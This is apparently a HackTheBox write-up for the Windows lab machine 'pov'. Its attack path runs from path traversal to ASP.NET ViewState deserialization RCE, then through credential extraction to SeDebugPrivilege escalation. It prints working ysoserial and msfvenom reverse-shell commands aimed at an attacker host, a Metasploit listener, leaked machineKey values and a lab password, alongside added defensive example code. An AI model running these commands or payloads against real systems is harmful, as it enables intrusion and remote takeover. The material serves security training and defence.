HTB: pov Writeup


Machine Information

Name: pov
OS: Windows
Difficulty: Medium
Points: N/A
Release Date: N/A
IP Address: 10.129.121.194
Author: D3vnomi

Machine Rating

⭐⭐⭐⭐☆ (7.0/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐⭐☆☆
  • Real-world: ⭐⭐⭐⭐☆
  • CVE: ⭐⭐☆☆☆
  • CTF-like: ⭐⭐⭐☆☆

Summary

pov is a Medium-difficulty Windows machine running IIS 10.0 on port 80. The exploitation path involves subdomain enumeration to discover dev.pov.htb, exploiting a path traversal vulnerability in the portfolio download feature to extract the ASP.NET machineKey, crafting a malicious ViewState payload using ysoserial.exe for remote code execution, discovering credentials via encrypted PowerShell XML files, and finally leveraging SeDebugPrivilege for privilege escalation to SYSTEM.

TL;DR: Subdomain enumeration → Path traversal (machineKey extraction) → ViewState deserialization RCE → Lateral movement (credential extraction) → SeDebugPrivilege escalation → SYSTEM.


Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.121.194

Results:

80/tcp open http Microsoft IIS httpd 10.0

Service Enumeration

Hostname: pov.htb
Subdomains: dev.pov.htb

echo "10.129.121.194 pov.htb dev.pov.htb" >> /etc/hosts

Subdomain Discovery

Use gobuster or ffuf to discover subdomains:

gobuster dns -d pov.htb -w /usr/share/wordlists/seclists/discovery/dns/subdomains-top1million-5000.txt

or

ffuf -w /path/to/wordlist -u "http://FUZZ.pov.htb" -H "Host: FUZZ.pov.htb"

This reveals dev.pov.htb, which hosts a portfolio application.

Directory Enumeration

Enumerate the dev.pov.htb subdomain:

feroxbuster -u http://dev.pov.htb -w /usr/share/wordlists/seclists/discovery/web-content/raft-large-words.txt

Key discovery: dev.pov.htb/portfolio with a “Download CV” feature.


Initial Foothold

Vulnerability: Path Traversal in Download Feature

The portfolio page at dev.pov.htb/portfolio contains a “Download CV” feature that accepts a POST request with a file parameter. This parameter is vulnerable to path traversal attacks.
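The download handler's mistake is a path-joining one, so the following added example (not code from the pov machine or from its author) shows the weak join beside a hardened resolver. CV_DIR, resolve_download_vulnerable, resolve_download_hardened and is_safe_download are names assumed for illustration; the inputs mirror the kind of file values discussed above.

```python
"""Added example (not code from the pov machine or its author): a download
handler's path handling, weak form beside a hardened form.

CV_DIR and the function names are assumed for illustration.
"""
from pathlib import Path

# Assumed directory that a "Download CV" feature is meant to serve from.
CV_DIR = Path("/srv/portfolio/cv")
ALLOWED_SUFFIXES = {".pdf"}


def resolve_download_vulnerable(base: Path, user_file: str) -> Path:
    """Weak pattern: join the user-supplied name straight onto the base directory.

    pathlib behaves like .NET's Path.Combine here: when the second operand is
    rooted ('/web.config') the base is discarded entirely, and '..' segments
    are never rejected, so the resolved path can land anywhere on disk.
    """
    return (base / user_file.replace("\\", "/")).resolve()


def resolve_download_hardened(base: Path, user_file: str) -> Path:
    """Return the path to serve, or raise ValueError for anything outside base."""
    candidate = user_file.replace("\\", "/")
    # Only a bare file name is acceptable: no separators, no dot names, no NULs.
    if "/" in candidate or candidate in ("", ".", "..") or "\0" in candidate:
        raise ValueError("file name must not contain path components")
    # Allowlist the file type the feature exists to serve.
    if Path(candidate).suffix.lower() not in ALLOWED_SUFFIXES:
        raise ValueError("only PDF downloads are served")
    base_resolved = base.resolve()
    target = (base_resolved / candidate).resolve()
    # Defence in depth: even after the name check, confirm the resolved path
    # (symlinks followed) still sits directly inside the download directory.
    if target.parent != base_resolved:
        raise ValueError("resolved path escapes the download directory")
    return target


def is_safe_download(base: Path, user_file: str) -> bool:
    """True if the hardened resolver would serve this name, False if it rejects it."""
    try:
        resolve_download_hardened(base, user_file)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for name in ("cv.pdf", "/web.config", "..\\..\\web.config", "notes.txt"):
        print(f"{name!r:24} weak     -> {resolve_download_vulnerable(CV_DIR, name)}")
        verdict = "served" if is_safe_download(CV_DIR, name) else "rejected"
        print(f"{'':24} hardened -> {verdict}")
```

The containment check after the name check matters because a name-only filter can be bypassed if the base directory itself contains a symlink; resolving both sides and comparing the parent closes that gap.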

Step 1: Identify the Vulnerability

Submit a POST request to the portfolio endpoint:

curl -X POST http://dev.pov.htb/portfolio/default.aspx -d "file=cv.pdf"

Step 2: Extract web.config via Path Traversal

Change the file parameter to traverse to the web.config file:

curl -X POST http://dev.pov.htb/portfolio/default.aspx -d "file=/web.config"

This reveals the ASP.NET web.config containing critical cryptographic keys:

Decryption Key:

74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43

Validation Key:

5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468

Encryption Algorithm: AES
Validation Algorithm: SHA1

ViewState Deserialization RCE

Step 1: Generate Malicious ViewState

Using ysoserial.exe, craft a malicious ViewState payload with a PowerShell reverse shell:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=4444 -f psh-cmd -o revshell.ps1

Get the base64-encoded payload:

cat revshell.ps1 | base64 -w 0

Step 2: Generate ViewState Gadget Chain

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -e <base64_revshell>" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"

This generates a malicious ViewState string that will deserialize and execute the payload.

Step 3: Deliver the Payload

Intercept requests to the portfolio page using Burp Suite. Inject the malicious ViewState into the __VIEWSTATE parameter and submit. The ASP.NET runtime will deserialize the payload and execute the reverse shell command.
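The whole ViewState step rests on the machineKey disclosed in the previous section, so the following added example (not the machine's or the author's code) audits the <machineKey> section of a web.config for the conditions that let a disclosed file turn into forged ViewState: static keys in plaintext, a legacy validation algorithm such as the SHA1 seen here, legacy ciphers, and a disabled ViewState MAC. Both sample configs are constructed, the key values are placeholders, and the defaults assumed when an attribute is absent follow .NET 4.x (validation HMACSHA256, decryption Auto).

```python
"""Added example (not the machine's or the author's code): audit the
<machineKey> section of an ASP.NET web.config. Sample configs are constructed;
key values are placeholders. Absent-attribute defaults assumed as in .NET 4.x.
"""
import xml.etree.ElementTree as ET

# Constructed sample shaped like the configuration recovered in this writeup
# (AES decryption, SHA1 validation, static keys). Key values are placeholders.
WEB_CONFIG_WEAK = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey decryption="AES" decryptionKey="PLACEHOLDER_DECRYPTION_KEY"
                validation="SHA1" validationKey="PLACEHOLDER_VALIDATION_KEY" />
    <pages enableViewStateMac="true" />
  </system.web>
</configuration>
"""

# Constructed sample of a hardened section: the machineKey element has been
# encrypted in place (as aspnet_regiis -pe does), so no key is readable from disk.
WEB_CONFIG_HARDENED = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey configProtectionProvider="RsaProtectedConfigurationProvider">
      <EncryptedData>PLACEHOLDER_CIPHERTEXT</EncryptedData>
    </machineKey>
  </system.web>
</configuration>
"""


def audit_machine_key(config_xml: str) -> list:
    """Return human-readable findings; an empty list means nothing was flagged."""
    root = ET.fromstring(config_xml)
    findings = []
    mk = root.find("./system.web/machineKey")
    if mk is None:
        # No explicit section: keys are auto-generated per server and never
        # written to the file, so a file-read bug cannot disclose them.
        return findings
    if mk.get("configProtectionProvider"):
        # Section stored encrypted; the attributes are not readable from the file.
        return findings
    for attr in ("validationKey", "decryptionKey"):
        value = mk.get(attr, "AutoGenerate")
        if not value.startswith("AutoGenerate"):
            findings.append(
                f"{attr} is a static value in plaintext; any file disclosure "
                f"(path traversal, backup, source leak) hands it over"
            )
    validation = mk.get("validation", "HMACSHA256").upper()
    if not validation.startswith("HMACSHA"):
        findings.append(f"validation={validation} is a legacy algorithm; use HMACSHA256 or stronger")
    decryption = mk.get("decryption", "Auto").upper()
    if decryption in ("DES", "3DES"):
        findings.append(f"decryption={decryption} is a legacy cipher; use AES")
    pages = root.find("./system.web/pages")
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings.append("enableViewStateMac=false lets unsigned ViewState reach the deserializer")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEB_CONFIG_WEAK), ("hardened", WEB_CONFIG_HARDENED)):
        print(f"[{label}]")
        for finding in audit_machine_key(cfg) or ["no findings"]:
            print("  -", finding)
```

Once the keys have been read by anyone, the MAC check passes for whatever they sign, so the only remediation is rotating both keys; encrypting the section with aspnet_regiis -pe and keeping the file out of reach of download handlers are what stop the disclosure in the first place.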

Result: Reverse shell as user sfitz on the target system.


User Compromise

Lateral Movement: Credential Extraction

As user sfitz, enumerate the file system to locate credentials:

dir Documents

Discover connection.xml in sfitz’s Documents folder. This file holds a credential object exported with Export-CliXml; its password is DPAPI-protected, so it can be decrypted by the account that saved it (sfitz):

$Credential = Import-CliXml -Path C:\Users\sfitz\Documents\connection.xml
$Credential.GetNetworkCredential() | Format-List *

Extracted Credentials:

UserName : alaading
Password : f8gQ8fynP44ek1m3

Executing Commands as alaading

Use RunasCs.exe to obtain a shell or execute commands as the alaading user:

.\RunasCs.exe -u alaading -p "f8gQ8fynP44ek1m3" powershell.exe

Alternatively, use Invoke-Command from sfitz’s session:

$cred = New-Object System.Management.Automation.PSCredential("alaading", (ConvertTo-SecureString "f8gQ8fynP44ek1m3" -AsPlainText -Force))
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock { whoami }

User Flag

cat C:\Users\alaading\Desktop\user.txt

🚩 User Flag: <REDACTED>


Privilege Escalation

Enumeration

As user alaading, check privileges:

whoami /priv

Key Finding: User alaading has SeDebugPrivilege, which allows the user to debug and manipulate other processes, including SYSTEM-level processes.

Exploitation Path 1: Meterpreter Migration to winlogon.exe

Step 1: Generate Meterpreter Payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=4444 -f exe -o meterpreter.exe

Step 2: Start Meterpreter Listener

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker_ip>
set LPORT 4444
run

Step 3: Execute Meterpreter as alaading

Transfer meterpreter.exe to the target and execute it as alaading:

.\meterpreter.exe

Step 4: Migrate to winlogon.exe

In the Meterpreter session, identify the winlogon.exe process (which runs as SYSTEM):

ps

Migrate to that process:

migrate <winlogon_pid>

Result: Shell as nt authority\system.

Exploitation Path 2: SeDebugPrivilege with PowerShell Token Elevation

Alternatively, use EnableAllTokenPrivs.ps1 to enable SeDebugPrivilege:

. .\EnableAllTokenPrivs.ps1

Then generate and execute a payload, and migrate into a SYSTEM-level process (e.g., winlogon.exe) as in Path 1.
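Both escalation paths above depend on a non-administrator holding SeDebugPrivilege, which Windows records: event 4672 lists the special privileges a new logon token carries, and event 4703 records a privilege being enabled in a token together with the process that did it. The following added example (not from the writeup) flags either event when the account is not on an expected-holders allowlist. The records are constructed in a simplified JSON shape, not the native event XML, and the field names and allowlist are assumptions.

```python
"""Added example (not from the writeup): flag SeDebugPrivilege held or enabled
by accounts that are not expected to have it. Records are a constructed,
simplified JSON shape, not Windows's native event XML; field names are assumed.
"""
import json

# Constructed sample events. 4672 = special privileges assigned to a new logon;
# 4703 = a token right was adjusted (EnabledPrivilegeList shows what was turned on).
SAMPLE_EVENTS = r"""
{"EventID": 4672, "Account": "SYSTEM", "Domain": "NT AUTHORITY", "PrivilegeList": "SeAssignPrimaryTokenPrivilege SeTcbPrivilege SeDebugPrivilege"}
{"EventID": 4672, "Account": "alaading", "Domain": "POV", "PrivilegeList": "SeDebugPrivilege SeChangeNotifyPrivilege"}
{"EventID": 4703, "Account": "alaading", "Domain": "POV", "ProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "EnabledPrivilegeList": "SeDebugPrivilege"}
{"EventID": 4672, "Account": "Administrator", "Domain": "POV", "PrivilegeList": "SeDebugPrivilege SeBackupPrivilege"}
{"EventID": 4703, "Account": "sfitz", "Domain": "POV", "ProcessName": "C:\\Windows\\System32\\svchost.exe", "EnabledPrivilegeList": "SeChangeNotifyPrivilege"}
"""

# Assumed allowlist: the accounts that legitimately hold the "Debug programs" right.
EXPECTED_DEBUG_HOLDERS = {("NT AUTHORITY", "SYSTEM"), ("POV", "Administrator")}


def flag_debug_privilege(event_lines: str, allowlist=EXPECTED_DEBUG_HOLDERS) -> list:
    """Return one alert dict per event where an unexpected account holds or enables SeDebugPrivilege."""
    alerts = []
    for line in event_lines.strip().splitlines():
        ev = json.loads(line)
        who = (ev.get("Domain", ""), ev.get("Account", ""))
        if ev["EventID"] == 4672:
            privs = ev.get("PrivilegeList", "").split()
            reason = "logon token carries SeDebugPrivilege"
        elif ev["EventID"] == 4703:
            privs = ev.get("EnabledPrivilegeList", "").split()
            reason = f"SeDebugPrivilege enabled in {ev.get('ProcessName', '?')}"
        else:
            continue  # other event IDs are not relevant to this rule
        if "SeDebugPrivilege" in privs and who not in allowlist:
            alerts.append({"event_id": ev["EventID"], "account": "\\".join(who), "reason": reason})
    return alerts


if __name__ == "__main__":
    for alert in flag_debug_privilege(SAMPLE_EVENTS):
        print(f"[{alert['event_id']}] {alert['account']}: {alert['reason']}")
```

The 4672 hit is the earlier and cheaper signal (it fires at logon, before any tooling runs); the 4703 hit pins down the process that turned the right on. The fix on the host side is the user-right assignment itself: "Debug programs" should contain only Administrators, which is the Windows default.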

Root Flag

cat C:\Windows\System32\config\root.txt

or

Get-Content C:\Users\Administrator\Desktop\root.txt

🚩 Root Flag: <REDACTED>


Attack Chain Summary

graph TD
A["Reconnaissance: nmap port 80, IIS 10.0"] --> B["Subdomain Enumeration: discover dev.pov.htb"]
B --> C["Directory Enumeration: find /portfolio endpoint"]
C --> D["Path Traversal: extract web.config and machineKey"]
D --> E["ViewState RCE: craft malicious payload with ysoserial.exe"]
E --> F["Initial Access: reverse shell as sfitz"]
F --> G["Credential Extraction: decode connection.xml"]
G --> H["Lateral Movement: execute as alaading user"]
H --> I["Privilege Escalation: SeDebugPrivilege"]
I --> J["Process Migration: winlogon.exe to SYSTEM"]
J --> K["System Compromise: nt authority\system shell"]

Tools Used

nmap: Port scanning and service fingerprinting
gobuster: Subdomain enumeration (dns mode)
ffuf: Web fuzzing and subdomain enumeration
feroxbuster: Recursive directory brute-forcing
Burp Suite: HTTP request interception and ViewState injection
ysoserial.exe: Malicious ViewState gadget chain generation
msfvenom: Meterpreter reverse shell payload generation
msfconsole: Metasploit multi-handler for reverse shell listener
RunasCs.exe: Execute commands as a different user (lateral movement)
nc/rlwrap: Reverse shell listener
PowerShell: Credential decryption and token manipulation

Key Learnings

  • Subdomain Enumeration: Always perform comprehensive subdomain enumeration; hidden subdomains often expose vulnerable applications not visible on the main domain.
  • Path Traversal in Downloads: Download features that accept file parameters are prime targets for path traversal attacks; always test with directory traversal payloads.
  • ASP.NET MachineKey Extraction: Compromised machineKey values allow attackers to forge ViewState tokens and achieve RCE through object deserialization gadget chains.
  • PowerShell Credential Storage: Encrypted credentials stored in XML files can often be decrypted by the owning user; always search for connection.xml or similar files in user directories.
  • SeDebugPrivilege Escalation: Users with SeDebugPrivilege can manipulate process tokens and migrate code execution to SYSTEM-level processes without requiring additional exploits.
  • Defense in Depth: Combining multiple weak controls (path traversal + insecure deserialization + weak privilege separation) creates a complete compromise path.

Author

D3vnomi


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.


Last Updated: 08 Mar 2026

Tags: #HackTheBox #Windows #Medium